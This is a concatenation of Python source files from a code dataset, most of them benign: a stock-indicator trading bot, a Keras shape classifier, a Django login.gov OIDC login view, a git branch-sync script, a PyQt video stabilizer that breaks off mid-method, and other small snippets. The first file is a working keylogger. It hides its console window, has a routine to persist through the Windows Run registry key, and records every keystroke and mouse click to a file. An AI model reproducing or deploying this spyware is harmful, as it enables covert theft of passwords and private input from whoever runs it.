import os, sys
from _winreg import *
buffer = []
#Hide
def hide():
import win32console, win32gui
window = win32console.GetConsoleWindow()
win32gui.ShowWindow(window, 0)
return True
# Add to startup
def addStartup():
fp=os.path.dirname(os.path.realpath(__file__))
file_name=sys.argv[0].split("\\")[-1]
new_file_path=fp+"\\"+file_name
keyVal= r'Software\Microsoft\Windows\CurrentVersion\Run'
key2change= OpenKey(HKEY_CURRENT_USER,keyVal,0,KEY_ALL_ACCESS)
SetValueEx(key2change, "The_Watch",0,REG_SZ, new_file_path)
def OnKeyboardEvent(event):
with open("gold.txt", "a") as writer:
if event.KeyID != 13:
buffer.append(chr(event.Ascii))
writer.write(chr(event.Ascii))
if event.KeyID == 8:
buffer.append("BackSpace")
writer.write("BackSpace")
elif event.KeyID == 13:
buffer.append("\n")
with open("bufferTXT.txt", 'a') as buffwritter:
buffwritter.writelines(buffer)
del buffer[:]
return True
def onClick(event):
with open("gold.txt", "a") as writer:
mouseClick = event.Position
writer.write("\n"+str(mouseClick))
return True
hide()
#addStartup()
manager = pyHook.HookManager()
manager.KeyDown = OnKeyboardEvent
manager.HookKeyboard()
manager.SubscribeMouseAllButtonsDown(onClick)
manager.HookMouse()
pythoncom.PumpMessages()
manager.UnhookMouse()
manager.UnhookKeyboard()
|
StarcoderdataPython
|
4987973
|
<gh_stars>0
import sys
import random
from datetime import datetime
import matplotlib.pyplot as plt
import numpy as np
import talib as ta
#list of functions
#print ta.get_functions()
#print ta.get_function_groups()
#https://github.com/mrjbq7/ta-lib
#http://www.eickonomics.com/posts/2014-03-25-python-vs-R-adding-TA-
#indicators/
import config as cfg
from misc import msg
class Analyze(object):
def __init__(self, symbol, date, weights):
self.symbol = symbol
self.date = date
self.price = 0.0
self.evaluation = 0.0
self.indicator_listing = ['macd', 'bollinger', 'rsi', 'obv']
self.indicators = self.init_indicators()
if weights:
self.weights = weights
else:
self.weights = self.init_indicators(val=1.0)
self.get_data()
if self.data.size > 0:
self.calc_indicators()
self.evaluate()
def get_data(self):
#query all dates before self.date
query = cfg.db.cur.execute(
'select Date,AdjClose,Volume from %s' % self.symbol)
query = cfg.db.cur.fetchall()
data = []
for item in query:
if (datetime.strptime(item[0], '%Y-%m-%d')
<= datetime.strptime(self.date, '%Y-%m-%d')):
if item[1] != 'null':
data.append(item)
else:
break
self.data = np.asarray(data)
#just pass if no data
if not data:
return
#unpack data
self.price = float(data[-1][1]) if len(data) > 0 else 0.0
self.indicators['date'] = np.asarray([datetime.strptime(x,
'%Y-%m-%d') for x in self.data[:, 0]])
self.indicators['price'] = np.asarray([float(x)
for x in self.data[:, 1]])
self.indicators['volume'] = np.asarray([float(x)
for x in self.data[:, 2]])
def init_indicators(self, val=0.0):
indicators = {}
for indicator in self.indicator_listing:
indicators[indicator] = val
return indicators
def calc_indicators(self):
#horizontal line data useful for plotting
self.indicators['zero'] = np.asarray([0.0 for _ in
self.indicators['price']])
self.indicators['fifty'] = np.asarray([50.0 for _ in
self.indicators['price']])
#macd
#macddiff = 12ema - 26ema
#macdsignal = 9ema of macd
#macdhist = macd - signal
macd_ind, macd_signal, macd_hist = ta.MACD(self.indicators['price'],
fastperiod=12, slowperiod=26, signalperiod=9)
self.indicators['macd_ind'] = macd_ind
self.indicators['macd_signal'] = macd_signal
self.indicators['macd_hist'] = macd_hist
#macd signal crossover
if len(macd_ind) > 33: #need 34 days of prices
today = macd_ind[-1] - macd_signal[-1]
yesterday = macd_ind[-2] - macd_signal[-2]
#macd crosses above signal --> buy
if today > 0 and yesterday < 0:
self.indicators['macd'] = 1.0
#macd crosses below signal --> sell
elif today < 0 and yesterday > 0:
self.indicators['macd'] = -1.0
#other indicators
#price diverges from macd --> end of current trend
#macd rises dramatically --> overbought and will return normal
#macd above zero --> upward momentum
#macd below zero --> downward momentum
#calc bollinger bands
#middle = 21sma
upper, middle, lower = ta.BBANDS(self.indicators['price'],
timeperiod=5, nbdevup=2, nbdevdn=2, matype=0)
self.indicators['bollinger_upper'] = upper
self.indicators['bollinger_middle'] = middle
self.indicators['bollinger_lower'] = lower
#FIXME: set number [-1,1] for buy, sell
self.indicators['bollinger'] = 0.0
#calc rsi
rsi = ta.RSI(self.indicators['price'], timeperiod=14)
self.indicators['rsi_ind'] = rsi
#FIXME: convert to [-1,1] for sell, buy
self.indicators['rsi'] = 0.0
#calc on-balance volume
#obv = prev volume + change in volume
#FIXME: plot messed up but numbers are fine
obv = ta.OBV(self.indicators['price'], self.indicators['volume'])
self.indicators['obv_ind'] = obv
#FIXME: convert to [-1,1] for sell, buy
self.indicators['obv'] = 0.0
#calc ema
ema12 = ta.EMA(self.indicators['price'], timeperiod=12)
ema26 = ta.EMA(self.indicators['price'], timeperiod=26)
self.indicators['ema12'] = ema12
self.indicators['ema26'] = ema26
#debug plot
#window = 0
#self.plot(['volume', 'obv'], days=window)
#self.plot(['fifty', 'rsi'], days=window)
#self.plot(['zero', 'macd_ind', 'macd_signal'], days=100)
#self.plot(['price', 'ema12', 'ema26'], days=window)
#self.plot(['price', 'upperbb', 'middlebb','lowerbb'], days=window)
#sys.exit()
def evaluate(self):
evaluation = 0.0
for key in self.indicator_listing:
evaluation += self.indicators[key] * self.weights[key]
self.evaluation = evaluation
#random evaluation
if cfg.random_trades:
scalar = 1 if random.random() < 0.5 else -1
self.evaluation = scalar * random.random()
def plot(self, keys, days=0):
#FIXME: https://stackoverflow.com/questions/9673988/intraday-candlestick-charts-using-matplotlib
#BETTER FIXME: https://www.quantopian.com/posts/plot-candlestick-charts-in-research
for key in keys:
y = self.indicators[key][-days:-1]
x = self.indicators['date'][-days:-1]
if key == 'price' or key == 'zero' or key == 'volume':
plt.plot(x, y,'b-', color='black', label=key)
else:
plt.plot(x, y,'-', label=key)
plt.title('daily chart %s' % self.symbol)
plt.xlabel('date')
plt.ylabel('price')
plt.legend(loc='best')
plt.show()
#chooses symbol based on evaluation
def best_eval(evals):
choices = []
for symbol in evals:
if not evals[symbol].data.size > 0: #no nflx data until 2002
continue
if abs(evals[symbol].evaluation) > cfg.eval_threshold:
choices.append(evals[symbol])
#FIXME: sort by bigger absolute val of eval then by cheaper price
return choices
def pick_trade(choice):
min_buypower = cfg.minshares * choice.price + 2 * cfg.commission
min_sellpower = cfg.commission
buypower = cfg.api.account_buypower()
shares = int(buypower / choice.price)
position = cfg.api.account_positions()[choice.symbol][0]
#debug print reason for no trade
if choice.evaluation > 0:
print ' BUYING: %s' % choice.symbol
if choice.evaluation <= cfg.eval_threshold:
print ' NO BUY: eval below threshold %s' % (
cfg.eval_threshold,)
if buypower <= min_buypower:
print ' NO BUY: not enough buypower %s < %s' % (buypower,
min_buypower)
if position > 0:
print ' NO BUY: already holding a position'
if choice.evaluation < 0:
print ' SELLING: %s' % choice.symbol
if choice.evaluation >= cfg.eval_threshold:
print ' NO SELL: eval below threshold %s' % (
cfg.eval_threshold,)
if buypower <= min_sellpower:
print ' NO SELL: not enough sellpower %s < %s' % (
buypower, min_sellpower)
if position <= 0:
print ' NO SELL: no shares to sell'
#buy
if (choice.evaluation > cfg.eval_threshold
and buypower > min_buypower and position <= 0):
return (choice.symbol, choice.price, shares)
#sell
elif (choice.evaluation < cfg.eval_threshold
and buypower > min_sellpower and position > 0):
return (choice.symbol, choice.price, -shares)
#do nothing
return (choice.symbol, choice.price, 0.0)
|
StarcoderdataPython
|
74663
|
<filename>make_demo_discover_rt/pysequitur/__init__.py<gh_stars>10-100
#!/usr/local/bin/python
# -*- coding: utf-8 -*-
# file: __init__.py
from .main import Sequencer, Sequencer2, print_grammar, AlphabetsTransformer
"""
exporting:
- Sequencer
- Sequencer2
- print_grammar
"""
|
StarcoderdataPython
|
11255917
|
<gh_stars>1-10
#!/usr/bin/env python3
from setuptools import setup
setup(
name="wisdom",
version="2.1",
description="A collection of wise quotes for the terminal",
long_description=open("README.md").read(),
license="MIT",
packages=["libwisdom"],
scripts=["wisdom"],
package_data={"libwisdom": ["data/*"]},
)
|
StarcoderdataPython
|
1708720
|
import numpy as np
import keras
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Conv2D
from keras.layers import MaxPooling2D
from keras.layers import Flatten
import robolib.robogui.pixel_editor as pe
import cv2
import robolib.images.feature_extraction as extr
DEBUG = True
label_labels = ["O", "X"]
labels = np.random.randint(0, 2, size=(1000, 1))
size = 9
data = np.zeros(shape=(1000, size, size, 1))
for la, d in zip(labels, data):
img = np.empty((size, size))
img.fill(-1)
if la == 0:
cv2.ellipse(img, (4, 4), (np.random.randint(2, 5), np.random.randint(2, 5)), 0, 360, 0, 1)
else:
randPointStart = np.random.randint(0, 16)
randPointEnd = np.random.randint(0, 16)
cv2.line(img, (int(randPointStart / 4), randPointStart % 4), (8 - int(randPointEnd / 4), 8 - randPointEnd % 4), 1)
randPointStart = np.random.randint(0, 16)
randPointEnd = np.random.randint(0, 16)
cv2.line(img, (8 - int(randPointStart / 4), randPointStart % 4), (int(randPointEnd / 4), 8 - randPointEnd % 4), 1)
img = extr.resize_image_to_info(img, size, size)
d[:, :, :] = np.reshape(img, (size, size, 1))
if DEBUG:
if pe.show_image(img):
DEBUG = False
model = Sequential()
model.add(Conv2D(9, (3, 3), activation='relu', input_shape=(size, size, 1)))
model.add(Conv2D(9, (3, 3), activation='relu'))
model.add(MaxPooling2D((2, 2), (2, 2)))
# model.add(Conv2D(3, (3, 3), activation='relu'))
# model.add(MaxPooling2D((2, 2), (2, 2)))
model.add(Flatten())
model.add(Dense(9, activation='relu'))
model.add(Dense(2, activation='relu'))
model.add(Dense(2, activation='softmax'))
model.compile(optimizer='rmsprop',
loss='categorical_crossentropy',
metrics=['accuracy'])
tbCallback = keras.callbacks.TensorBoard(log_dir="./logs", write_images=True)
one_hot_labels = keras.utils.to_categorical(labels, num_classes=2)
model.fit(data, one_hot_labels, epochs=250, batch_size=80, callbacks=[tbCallback])
while True:
predict_data = pe.get_drawing_input(size, size, size*3, size*3)
if all(1.0 not in row for row in predict_data):
break
# if DEBUG:
pe.show_image(predict_data)
output = model.predict(np.array([predict_data]), 1, 3)
if all(all(n < 0.9 for n in m) for m in output):
print("Don't know, will guess: ")
print(label_labels[np.argmax(output)])
if DEBUG:
print(np.around(output, 5))
|
StarcoderdataPython
|
319783
|
<reponame>Liu-JiaTong/DataEngine
import pandas as pd
from fbprophet import Prophet
import matplotlib.pyplot as plt
get_ipython().run_line_magic('matplotlib', 'inline')
# 读入数据集
df = pd.read_csv('./DataSet/train.csv')
# 拟合模型
model = Prophet(yearly_seasonality=True, seasonality_prior_scale=0.1)
model.fit(df)
# 构建待预测日期数据框,七个月后
future = model.make_future_dataframe(periods=213)
# 预测数据集
forecast = model.predict(future)
# 预测结果
model.plot(forecast)
plt.show()
|
StarcoderdataPython
|
5126501
|
while True:
n = int(input('Quer ver a tabuada de qual valor? '))
print('-'*35)
if n < 0: # Mostra a tabuada enquanto o usuário não digitar um valor negativo
break
for i in range(0, 11): # Quando o progressão é de apenas 1, o 1 pode ser omitido
print(f'{n} X {i} = {n*i}')
print('-'*35)
print('Tabuada Encerrada. Volte Sempre!')
|
StarcoderdataPython
|
3505754
|
# Python RPG
# <NAME>
# https://github.com/AlexGalhardo/Python-RPG
# <EMAIL>
# https://alexgalhardo.com
# !/usr/bin/python3
# coding: utf-8
# ./Python/Monsters/PitsOfInferno_Monsters/Bear.py
from SuperClass.NormalMonster import NormalMonster
from Global.GLOBAL_PITS_OF_INFERNO_VARIABLES import GLOBAL_BEAR_LIFE, \
GLOBAL_BEAR_NAME, \
GLOBAL_BEAR_WEAPON_ATTACK, \
GLOBAL_BEAR_EXPERIENCE
class Bear(NormalMonster):
'''
-- Herance LivingBeing
self.livingBeingtotalLife
self.livingBeingCurrentlyLife
def setLiveBeingTotalLife( $setLiveBeingTotalLife )
def getLiveBeingTotalLife():int
'''
'''
-- Herance NormalMonster
self.normalMonsterSpellDamage = normalMonsterSpellDamage
self.normalMonsterName = normalMonsterName
self.normalMonsterExperienceForKill = normalMonsterExperienceForKill
self.lootGoldCoins = randint(100, 500)
'''
def __init__(self):
# constructor Normal Monster
super().__init__( GLOBAL_BEAR_LIFE,
GLOBAL_BEAR_NAME,
GLOBAL_BEAR_WEAPON_ATTACK,
GLOBAL_BEAR_EXPERIENCE )
|
StarcoderdataPython
|
3245063
|
from typing import List
def ref_range_to_refs(ref_range: str) -> List[str]:
"""
Given a ref range like eg ibr152-ibr155
returns a list of the individual refs, eg
[ibr152,ibr153,ibr154,ibr155]
assumptions:
- always comprises alphabetic then number
- alphabetic bit always constant
- number always same number of digits
- only two refs in range, separated by '-'
"""
prefix = ''
prefix_length = 0
left, right = ref_range.split('-')
assert len(left) == len(right)
while prefix_length < len(left) and left[prefix_length] == right[prefix_length]:
prefix_length += 1
prefix = left[:prefix_length]
start = int(left[prefix_length:])
numeric_length = len(left) - prefix_length
end = int(right[prefix_length:])
refs = [prefix + str(idx).rjust(numeric_length, '0') for idx in range(start, end + 1)]
return refs
|
StarcoderdataPython
|
125750
|
<reponame>ganadist/r8
#!/usr/bin/env python
# Copyright (c) 2019, the R8 project authors. Please see the AUTHORS file
# for details. All rights reserved. Use of this source code is governed by a
# BSD-style license that can be found in the LICENSE file.
# Script that automatically pulls and uploads all upstream direct and indirect
# branches into the current branch.
#
# Example:
#
# $ git branch -vv
# * feature_final xxxxxxxxx [feature_prereq_c: ...] ...
# feature_prereq_c xxxxxxxxx [feature_prereq_b: ...] ...
# feature_prereq_b xxxxxxxxx [feature_prereq_a: ...] ...
# feature_prereq_a xxxxxxxxx [master: ...] ...
# master xxxxxxxxx [origin/master] ...
#
# Executing `git_sync_cl_chain.py -m <message>` causes the following chain of
# commands to be executed:
#
# $ git checkout feature_prereq_a; git pull; git cl upload -m <message>
# $ git checkout feature_prereq_b; git pull; git cl upload -m <message>
# $ git checkout feature_prereq_c; git pull; git cl upload -m <message>
# $ git checkout feature_final; git pull; git cl upload -m <message>
import optparse
import os
import sys
import defines
import utils
REPO_ROOT = defines.REPO_ROOT
class Repo(object):
def __init__(self, name, is_current, upstream):
self.name = name
self.is_current = is_current
self.upstream = upstream
def ParseOptions(argv):
result = optparse.OptionParser()
result.add_option('--message', '-m', help='Message for patchset')
result.add_option('--rebase',
help='To use `git pull --rebase` instead of `git pull`',
action='store_true')
result.add_option('--no_upload', '--no-upload',
help='Disable uploading to Gerrit', action='store_true')
(options, args) = result.parse_args(argv)
options.upload = not options.no_upload
assert options.message, 'A message for the patchset is required.'
assert len(args) == 0
return options
def main(argv):
options = ParseOptions(argv)
rebase_args = ['--rebase'] if options.rebase else []
with utils.ChangedWorkingDirectory(REPO_ROOT, quiet=True):
branches = [
parse(line)
for line in utils.RunCmd(['git', 'branch', '-vv'], quiet=True)]
current_branch = None
for branch in branches:
if branch.is_current:
current_branch = branch
break
assert current_branch is not None
if current_branch.upstream == None:
print('Nothing to sync')
return
stack = []
while current_branch:
stack.append(current_branch)
if current_branch.upstream is None or current_branch.upstream == 'master':
break
current_branch = get_branch_with_name(current_branch.upstream, branches)
while len(stack) > 0:
branch = stack.pop()
print('Syncing ' + branch.name)
utils.RunCmd(['git', 'checkout', branch.name], quiet=True)
utils.RunCmd(['git', 'pull'] + rebase_args, quiet=True)
if options.upload:
utils.RunCmd(['git', 'cl', 'upload', '-m', options.message], quiet=True)
utils.RunCmd(['git', 'cl', 'issue'])
def get_branch_with_name(name, branches):
for branch in branches:
if branch.name == name:
return branch
return None
# Parses a line from the output of `git branch -vv`.
#
# Example output ('*' denotes the current branch):
#
# $ git branch -vv
# * feature_final xxxxxxxxx [feature_prereq_c: ...] ...
# feature_prereq_c xxxxxxxxx [feature_prereq_b: ...] ...
# feature_prereq_b xxxxxxxxx [feature_prereq_a: ...] ...
# feature_prereq_a xxxxxxxxx [master: ...] ...
# master xxxxxxxxx [origin/master] ...
def parse(line):
is_current = False
if line.startswith('*'):
is_current = True
line = line[1:].lstrip()
else:
line = line.lstrip()
name_end_index = line.index(' ')
name = line[:name_end_index]
line = line[name_end_index:].lstrip()
if ('[') not in line or ':' not in line:
return Repo(name, is_current, None)
upstream_start_index = line.index('[')
line = line[upstream_start_index+1:]
upstream_end_index = line.index(':')
upstream = line[:upstream_end_index]
return Repo(name, is_current, upstream)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
StarcoderdataPython
|
6606929
|
import sys
import os
import requests
class Client(object):
"""A simple API client for the Xray's API.
see README for more details
"""
tests_name = []
test_suites = []
#last_update = 89
def __init__(self, api_token=None, url_base=""):
self.api_token = api_token
self.vars = "" #["startUrl" : "http://google.com",... ]
self.url_base = url_base
###
def _request(self, path, parameters=None):
data = requests.get("%s%s?apiKey=%s" % (self.url_base, path, self.api_token))
print("%s%s?apiKey=%s" % (self.url_base, path, self.api_token))
return data.json()
###EXTRAS
def get_id_by_test_name(self, testid):
"""
"""
response = self._request("tests/<testId>/")
print(response)
return response
def get_test_by_name(self, test_name):
"""
"""
id = self.get_id_by_test_name(test_name)
self.get_test_by_id(id)
response = self._request("tests/<testId>/")
print(response)
return response
###TESTS
def get_test_by_id(self, testid):
"""
"""
response = self._request("tests/<testId>/")
print(response)
return response
def get_tests(self):
"""
"""
response = self._request("tests/")
print(response)
return response
###TESTS_SUITES
def get_test_suites(self):
"""
"""
response = self._request("tests/")
print(response)
return response
def get_test_suite(self):
"""
"""
response = self._request("tests/")
print(response)
return response
###TESTS_RESULTS
def get_suite_results_by_results_id(self, id):
"""
"""
print("get_test_results")
response = self._request("tests/")
print(response)
return response
def get_results_id(self, id):
"""
"""
print("get_test_results")
response = self._request("tests/")
print(response)
return response
###TESTS_EXUCUTIONS
def run_test(self):
"""
"""
response = self._request("tests/")
print(response)
return response
|
StarcoderdataPython
|
9694811
|
<reponame>SmartDataAnalytics/KEEN-Preprocessor<filename>src/kupp/instance_creation_utils/utils.py
# -*- coding: utf-8 -*-
import numpy as np
from typing import Dict
from kupp.triples_preprocessing_utils.basic_triple_utils import slice_triples
def create_multi_label_relation_instances(unique_entity_pairs: np.array,
triples: np.array,
num_relations: int,
create_class_other=False
) -> Dict[tuple, np.array]:
"""Create for each (s,o) pair the multi relation label."""
subjects, relations, objects = slice_triples(triples)
entity_pairs = np.concatenate([subjects, objects], axis=1)
# Create class 'other' for relations not contained in the KG
if create_class_other:
num_relations += 1
s_t_to_multi_relations = create_multi_label_instances(unique_pairs=unique_entity_pairs,
pairs=entity_pairs,
elements=relations,
num_elements=num_relations)
return s_t_to_multi_relations
def create_multi_label_objects_instance(unique_s_r_pairs: np.array,
triples: np.array,
num_entities: int, ) -> Dict[tuple, np.array]:
"""Create for each (s,r) pair the multi object label."""
subjects, relations, objects = slice_triples(triples)
s_r_pairs = np.concatenate([subjects, relations], axis=1)
s_r_to_mulit_objects = create_multi_label_instances(unique_pairs=unique_s_r_pairs,
pairs=s_r_pairs,
elements=objects,
num_elements=num_entities)
return s_r_to_mulit_objects
def create_multi_label_instances(unique_pairs: np.array,
pairs: np.array,
elements: np.array,
num_elements) -> Dict[tuple, np.array]:
"""Create for each (element_1, element_2) pair the multi-label."""
instance_to_multi_label = {}
for unique_pair in unique_pairs:
# Step 1: Get all corresponding elements of pair
indices = np.where((pairs == unique_pair).all(-1))
all_corresponding_elements_of_pair = np.array(np.sort(elements[indices]).tolist(), dtype=np.int)
# Step 2: Create hot encoding labels
multi_label = np.zeros(num_elements)
np.put(multi_label, all_corresponding_elements_of_pair, np.ones(len(all_corresponding_elements_of_pair)))
# Step 3: Save in dict
instance_to_multi_label[tuple(unique_pair)] = multi_label
return instance_to_multi_label
|
StarcoderdataPython
|
28944
|
def bolha_curta(self, lista):
fim = len(lista)
for i in range(fim-1, 0, -1):
trocou = False
for j in range(i):
if lista[j] > lista[j+1]:
lista[j], lista[j+1] = lista[j+1], lista[j]
trocou = True
if trocou== False:
return
|
StarcoderdataPython
|
5150607
|
"""Login.gov/authorize is redirected to this endpoint to start a django user session."""
import logging
from django.conf import settings
from django.contrib.auth import get_user_model, login
from django.core.exceptions import SuspiciousOperation
from django.http import HttpResponseRedirect
from django.utils import timezone
import jwt
import requests
from rest_framework import status
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.response import Response
from ..authentication import CustomAuthentication
from .utils import (
get_nonce_and_state,
generate_token_endpoint_parameters,
generate_jwt_from_jwks,
validate_nonce_and_state,
response_redirect,
)
logger = logging.getLogger()
logger.setLevel(logging.INFO)
class InactiveUser(Exception):
"""Inactive User Error Handler."""
pass
class TokenAuthorizationOIDC(ObtainAuthToken):
"""Define methods for handling login request from login.gov."""
@staticmethod
def decode_payload(id_token, options=None):
"""Decode the payload."""
if not options:
options = {'verify_nbf': False}
cert_str = generate_jwt_from_jwks()
# issuer: issuer of the response
# subject : UUID - not useful for login.gov set options to ignore this
try:
decoded_payload = jwt.decode(
id_token,
key=cert_str,
issuer=settings.LOGIN_GOV_ISSUER,
audience=settings.LOGIN_GOV_CLIENT_ID,
algorithms=["RS256"],
subject=None,
access_token=None,
options=options,
)
return decoded_payload
except jwt.ExpiredSignatureError:
return {"error": "The token is expired."}
def handle_user(self, request, id_token, decoded_payload):
"""Handle the incoming user."""
# get user from database if they exist. if not, create a new one
if "token" not in request.session:
request.session["token"] = id_token
# Authenticate users with the unique "subject" `sub` UUID from the payload.
sub = decoded_payload["sub"]
email = decoded_payload["email"]
# First account for the initial superuser
if email == settings.DJANGO_SUPERUSER_NAME:
# If this is the initial login for the initial superuser,
# we must authenticate with their username since we have yet to save the
# user's `sub` UUID from the decoded payload, with which we will
# authenticate later.
initial_user = CustomAuthentication.authenticate(
self, username=email
)
if initial_user.login_gov_uuid is None:
# Save the `sub` to the superuser.
initial_user.login_gov_uuid = sub
initial_user.save()
# Login with the new superuser.
self.login_user(request, initial_user, "User Found")
return initial_user
# Authenticate with `sub` and not username, as user's can change their
# corresponding emails externally.
user = CustomAuthentication.authenticate(
self, user_id=sub
)
if user and user.is_active:
# User's are able to update their emails on login.gov
# Update the User with the latest email from the decoded_payload.
if user.username != email:
user.email = email
user.username = email
user.save()
if user.deactivated:
self.login_user(request, user, "Inactive User Found")
else:
self.login_user(request, user, "User Found")
elif user and not user.is_active:
raise InactiveUser(
f'Login failed, user account is inactive: {user.username}'
)
else:
User = get_user_model()
user = User.objects.create_user(email, email=email, login_gov_uuid=sub)
user.set_unusable_password()
user.save()
self.login_user(request, user, "User Created")
return user
def login_user(self, request, user, user_status):
"""Create a session for the associated user."""
login(
request,
user,
backend="tdpservice.users.authentication.CustomAuthentication",
)
logger.info("%s: %s on %s", user_status, user.username, timezone.now)
def get(self, request, *args, **kwargs):
"""Handle decoding auth token and authenticate user."""
code = request.GET.get("code", None)
state = request.GET.get("state", None)
if code is None:
logger.info("Redirecting call to main page. No code provided.")
return HttpResponseRedirect(settings.FRONTEND_BASE_URL)
if state is None:
logger.info("Redirecting call to main page. No state provided.")
return HttpResponseRedirect(settings.FRONTEND_BASE_URL)
# get the validation keys to confirm generated nonce and state
nonce_and_state = get_nonce_and_state(request.session)
nonce_validator = nonce_and_state.get("nonce", "not_nonce")
state_validator = nonce_and_state.get("state", "not_state")
# build out the query string parameters
# and full URL path for OIDC token endpoint
token_params = generate_token_endpoint_parameters(code)
token_endpoint = settings.LOGIN_GOV_TOKEN_ENDPOINT + "?" + token_params
token_response = requests.post(token_endpoint)
if token_response.status_code != 200:
return Response(
{
"error": (
"Invalid Validation Code Or OpenID Connect Authenticator "
"Down!"
)
},
status=status.HTTP_400_BAD_REQUEST,
)
token_data = token_response.json()
id_token = token_data.get("id_token")
decoded_payload = self.decode_payload(id_token)
if decoded_payload == {"error": "The token is expired."}:
return Response(decoded_payload, status=status.HTTP_401_UNAUTHORIZED)
decoded_nonce = decoded_payload["nonce"]
if not validate_nonce_and_state(
decoded_nonce, state, nonce_validator, state_validator
):
msg = "Could not validate nonce and state"
raise SuspiciousOperation(msg)
if not decoded_payload["email_verified"]:
return Response(
{"error": "Unverified email!"}, status=status.HTTP_400_BAD_REQUEST
)
try:
user = self.handle_user(request, id_token, decoded_payload)
return response_redirect(user, id_token)
except InactiveUser as e:
logger.exception(e)
return Response(
{
"error": str(e)
},
status=status.HTTP_401_UNAUTHORIZED
)
except Exception as e:
logger.exception(f"Error attempting to login/register user: {e} at...")
return Response(
{
"error": (
"Email verified, but experienced internal issue "
"with login/registration."
)
},
status=status.HTTP_400_BAD_REQUEST,
)
|
StarcoderdataPython
|
53103
|
<gh_stars>0
class Solution:
# Iterative
def invertTree(self, root: Optional[TreeNode]) -> Optional[TreeNode]:
if not root:
return None
stack = [root]
while len(stack) > 0:
currentNode = stack.pop()
currentNode.left, currentNode.right = currentNode.right, currentNode.left
if currentNode.left is not None:
stack.append(currentNode.left)
if currentNode.right is not None:
stack.append(currentNode.right)
return root
# Recursive
def invertTree(self, root: Optional[TreeNode]) -> Optional[TreeNode]:
if not root:
return None
root.left, root.right = root.right, root.left
self.invertTree(root.left)
self.invertTree(root.right)
return root
|
StarcoderdataPython
|
5010030
|
<filename>Important/print_primeList.py
for n in range(1,101):
prime=True
for i in range(2,n):
if(n%2==0):
prime=False
if prime:
print n
|
StarcoderdataPython
|
8060389
|
<gh_stars>0
"""
The Update super class
"""
from Product.Database.DBConn import create_session
class Update:
"""
Author: <NAME>, <NAME>
Date: 9/11/2017
Last update: 13/11/2017
Purpose: Its subclasses should be used to retrieve from the database
"""
def __init__(self):
"""
Author: <NAME>, <NAME>
Date: 2017-11-10
Last update:
Purpose:
The constructor of the Retrieve class, creates a session to be used by subclass
"""
self.session = create_session()
|
StarcoderdataPython
|
6412906
|
<filename>tests/test_dnssec_api.py
import unittest
from namecom import DnssecApi, exceptions
from .sample import (
correct_auth,
dnssec_sample1 as sample1,
dnssec_sample2 as sample2
)
api = DnssecApi(domainName=sample1.domainName, auth=correct_auth, use_test_env=True)
class DnssecApiTestCase(unittest.TestCase):
def test_list_dnssec(self):
result = api.list_dnssecs()
dnssecs = result.dnssecs
self.assertIn(sample2, dnssecs)
def test_get_dnssec(self):
result = api.get_dnssec(sample2.digest)
dnssec = result.dnssec
self.assertEqual(dnssec, sample2)
def test_create_delete_dnssec(self):
# cleanup existing data
try:
api.delete_dnssec(sample1.digest)
except exceptions.NamecomError:
pass
result = api.create_dnssec(
keyTag=sample1.keyTag,
algorithm=sample1.algorithm,
digestType=sample1.digestType,
digest=sample1.digest
)
dnssec = result.dnssec
self.assertEqual(dnssec, sample1)
result = api.delete_dnssec(sample1.digest)
self.assertEqual(result.status_code, 200)
|
StarcoderdataPython
|
1615147
|
<gh_stars>100-1000
load(":flake8_config.bzl", "Flake8Info")
def _flake8_impl(ctx):
srcs = extract_files(ctx.attr.srcs)
file_paths = short_paths(srcs)
config = ctx.attr.lint_config[Flake8Info].config_file.files.to_list()[0]
test = [
"#!/usr/bin/env bash",
"echo \"{bin} --config {config} {files}\"".format(
bin = ctx.executable._flake8_cli.short_path,
config = config.short_path,
files = " ".join(file_paths),
),
"{bin} --config {config} {files}".format(
bin = ctx.executable._flake8_cli.short_path,
config = config.short_path,
files = " ".join(file_paths),
),
]
out = ctx.actions.declare_file(ctx.label.name + "_exec")
ctx.actions.write(
output = out,
content = "\n".join(test),
)
runfiles = ctx.runfiles(
files = srcs + [config],
)
runfiles = runfiles.merge(ctx.attr._flake8_cli[DefaultInfo].default_runfiles)
return [
DefaultInfo(
executable = out,
runfiles = runfiles,
),
]
flake8_test = rule(
implementation = _flake8_impl,
attrs = {
"srcs": attr.label_list(allow_files = True),
"lint_config": attr.label(
providers = [
Flake8Info,
],
),
"_flake8_cli": attr.label(
cfg = "host",
default = "//lint/private/python:flake8",
providers = [
DefaultInfo,
],
executable = True,
),
},
executable = True,
test = True,
)
def extract_files(srcs):
filtered = []
for s in srcs:
files = s.files.to_list()
for f in files:
if f.dirname.startswith("external"):
continue
filtered.append(f)
return filtered
def short_paths(files):
sn = []
for f in files:
sn.append(f.short_path)
return sn
|
StarcoderdataPython
|
11249307
|
import cv2
from PyQt5.QtWidgets import QMainWindow, QFileDialog
from PyQt5.QtCore import QThread, pyqtSignal
from .configScreen import ConfigScreen
from .resultScreen import ResultScreen
from .titleScreen import TitleScreen
from .loadingScreen import LoadingScreen
from src.tracker import Tracker
from src.stabilizer import Stabilizer
import src.converter as video_utils
import tempfile
import shutil
class MainWindow(QMainWindow):
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent)
self.setFixedSize(1280, 720)
self.title_screen = TitleScreen()
self.config_screen = ConfigScreen()
self.loading_screen = LoadingScreen()
self.result_screen = ResultScreen()
self.start_title_screen()
def start_config_screen(self):
self.config_screen.video_path = self.input_file_path
self.config_screen.setup_ui(self)
self.config_screen.button_cancel.clicked.connect(self.return_to_title_screen)
self.config_screen.button_select.clicked.connect(self._roi_selection)
self.show()
def start_result_screen(self):
self.result_screen.video_path = self.output_file_path
self.result_screen.setup_ui(self)
self.result_screen.button_restart.clicked.connect(self.close_result_screen)
self.result_screen.button_close.clicked.connect(self.close)
def close_result_screen(self):
self.result_screen._stop()
self.start_title_screen()
def return_to_title_screen(self):
self.config_screen._stop()
self.start_title_screen()
def start_title_screen(self):
self.title_screen.setup_ui(self)
self.title_screen.button_select.clicked.connect(self._selectFile)
self.show()
def _selectFile(self):
self.input_file_path, _ = QFileDialog.getOpenFileName(self, "Select file", "",
"Movie files (*.mp4 *.avi *.wmv *.mov *.mkv)")
if self.input_file_path != "":
self.start_config_screen()
def _roi_selection(self):
self.config_screen.button_select.clicked.disconnect(self._roi_selection)
self.config_screen._force_stop()
is_manual_enabled = self.config_screen.radio_manual_object_selection.isChecked()
self.video_capture = video_utils.create_video_capture(self.input_file_path)
video_frames = video_utils.video_to_frame_list(self.video_capture)
if is_manual_enabled:
